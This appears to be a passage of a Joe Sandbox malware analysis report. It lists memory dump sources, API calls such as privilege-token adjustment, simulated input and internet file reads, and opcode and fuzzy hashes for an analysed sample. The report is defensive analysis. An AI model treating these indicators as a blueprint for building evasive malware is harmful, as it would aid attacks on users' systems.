                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                          • Instruction ID: a526151324bee506c915eff620fb7685bb4bb7696fc4c715abcd733d6c94bf87
                                                                                                          • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                          • Instruction Fuzzy Hash: D8516D72A08A4686DB24DF29D4A42EC7760FB85F94F504236CB5E837AACF7DD951C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID:
                                                                                                          • API String ID: 1682464887-0
                                                                                                          • Opcode ID: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                                                          • Instruction ID: 99912650447ba8cb119ee186ee7e54bd35c480de5831f0dae3f5f7aad3fec4fe
                                                                                                          • Opcode Fuzzy Hash: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                                                          • Instruction Fuzzy Hash: 3D314432608B8586E7109F29E4502AE7760FB85F94F114131DB8E477AADF7DD546CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 2278415577-0
                                                                                                          • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                                          • Instruction ID: eba969b6185c5a0be91e648983c9fadecff06ac061eef30cf4f176113f8f982d
                                                                                                          • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                                          • Instruction Fuzzy Hash: 1321B072A08A8689E714DF2AE4503A977A0FB89FD4F488435DF4C4775ACF78D955C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3429775523-0
                                                                                                          • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                          • Instruction ID: 5bcd501a6461202b047beb21c928c03b08fe44e1c1e0015db27d5ad9785ee4e6
                                                                                                          • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                          • Instruction Fuzzy Hash: 4E014C736247818FE7208F24E4957AA33A0F75476EF400A29E64986AD9CF7DC258CB80
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF6B5B5475C,?,?,00000000,00007FF6B5B547D9,?,?,?,?,?,00007FF6B5BA2210), ref: 00007FF6B5B5BF3F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileSystem
                                                                                                          • String ID: GetSystemTimePreciseAsFileTime
                                                                                                          • API String ID: 2086374402-595813830
                                                                                                          • Opcode ID: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                                          • Instruction ID: e8ab165c61389bec76864189e49d7d7d17d1b105bf02d700f0f1672bb16d41de
                                                                                                          • Opcode Fuzzy Hash: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                                          • Instruction Fuzzy Hash: 66F01C10A59A4792EA089B59F4750F47211AF4AFC0F545031EB0E4639ADE3CD844C704
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                          • String ID:
                                                                                                          • API String ID: 15204871-0
                                                                                                          • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                                                          • Instruction ID: f3d00cb68c434bdfb7f039e32c610926604694bc3adf8307d583eb51e657d802
                                                                                                          • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                                                          • Instruction Fuzzy Hash: F8B14A77604B848AEB15CF2DC8553A87BA0F746F48F18892ADB5D877A9CF39D852C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                          • Instruction ID: 70b4fcda480a92d358b87915c156f6c1ffd0517f9036d63f5f9d9255d00094de
                                                                                                          • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                          • Instruction Fuzzy Hash: 35117C32B0874182EB14DB2AE0943AC7760FB8AFA0F058631DB6D47B9ACF7CD8518710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479602957-0
                                                                                                          • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                          • Instruction ID: 1a63da01c8c34bc833b7deac2030ba5abec56b3c6a2cbd43b3a929e45b8b10ac
                                                                                                          • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                          • Instruction Fuzzy Hash: E5F0C862A08B4241E7205B1AF4106AAA6A5FFCAB94F104134EB9D83BDEDE3CC8048B00
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: a/p$am/pm
                                                                                                          • API String ID: 0-3206640213
                                                                                                          • Opcode ID: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                                                          • Instruction ID: 02b8d80d27602ad78f58cadf697fe547afeb5ad0a7d2245d1d500f5f131fb3cf
                                                                                                          • Opcode Fuzzy Hash: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                                                          • Instruction Fuzzy Hash: 90E1A122A0865285EB6C8F2CE1745F923A5FF06B80F544132EB1E8668EDF3DED51CB10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: 0$0x%p
                                                                                                          • API String ID: 3215553584-2479247192
                                                                                                          • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                                                          • Instruction ID: 6d2507630ba5ffc0f77c84bb0f641d5a2f47ce314e5e486e81633be37354604f
                                                                                                          • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                                                          • Instruction Fuzzy Hash: DE81B062A1868246EAB88A2D81696FD23A0EF43F44F542531DF0DD769FCF2DEC46D701
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Variable is not of type 'Object'.
                                                                                                          • API String ID: 0-1840281001
                                                                                                          • Opcode ID: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                                                                          • Instruction ID: 4398b770cdb6f05a2cdfe65e04c411c694de1eb98c2e43c1a0d3800e98543e74
                                                                                                          • Opcode Fuzzy Hash: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                                                                          • Instruction Fuzzy Hash: 0B524B32A086429AEB20DF69C4602FC27A5EB46B88F504135DF0DA7A8FDF39E945C750
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: no error
                                                                                                          • API String ID: 0-1106124726
                                                                                                          • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                                          • Instruction ID: 3b2458e5bf8ccc3110722e10c8f20d379dde8a1eb2678efba9eebaa8a7e5568a
                                                                                                          • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                                          • Instruction Fuzzy Hash: B3129C72A187928AE724CF69D8602ED37A4FB05B48B105135EF4E97B9ADF3CE940C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 101623796-0
                                                                                                          • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                                                          • Instruction ID: b62c019ee4aca4bd8e629a8bd48d4c816cb527819aa3be2168ece5ab4ef2ef9c
                                                                                                          • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                                                          • Instruction Fuzzy Hash: BF216262B08B9246FA64DA19E0607F96350FB8AF84F845135DB4C87B8EDF3CE941CB44
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InputSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3431551938-0
                                                                                                          • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                          • Instruction ID: ef1c1dcd12393a042b88726e2b581e8a23136761a8e41278fcd209d74efa0ad5
                                                                                                          • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                          • Instruction Fuzzy Hash: A9F0B46691C5C0C6D3308F15E45076A77A0F759B4DF405115EB8987BA5CF3EC5098F04
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: mouse_event
                                                                                                          • String ID:
                                                                                                          • API String ID: 2434400541-0
                                                                                                          • Opcode ID: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                                          • Instruction ID: 60e12fd2209f54820c91211ddcf74bca7aa99cdf22b2a486db6dac8f4032b4df
                                                                                                          • Opcode Fuzzy Hash: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                                          • Instruction Fuzzy Hash: 66E01A77E0C06296F2681A7E553A7B60741ABA3B00EA00135DB49C6ADFCD5DAE059514
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3215553584-4108050209
                                                                                                          • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                                                          • Instruction ID: fc197dd05abb3df6147da1c1899e85c377f63e3e5518832c4f3bd05fca576725
                                                                                                          • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                                                          • Instruction Fuzzy Hash: 2081C222A1860247EAB88A6D90606FE23A0EF47F44F541535DF09D769FCF7DEC469740
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3215553584-4108050209
                                                                                                          • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                                          • Instruction ID: cdb44d7d9dafe0f3afa323861852344916ba03a2e464e9f296f2916295173d9b
                                                                                                          • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                                          • Instruction Fuzzy Hash: 7C718F21A0CA8246FA788A2D90602FD67A1AF43F48F641535DF4DD76DFCE2DEC469B01
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                                                          • Instruction ID: cc967cb14d95f1ecdb7f675c488efd6843759214fc8ef46aacaed919bcfae4c5
                                                                                                          • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                                                          • Instruction Fuzzy Hash: 03419262714B5985EA48CF2AE8242E963A1BB4DFD4B49A037DF0E97759DF3CD845C300
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
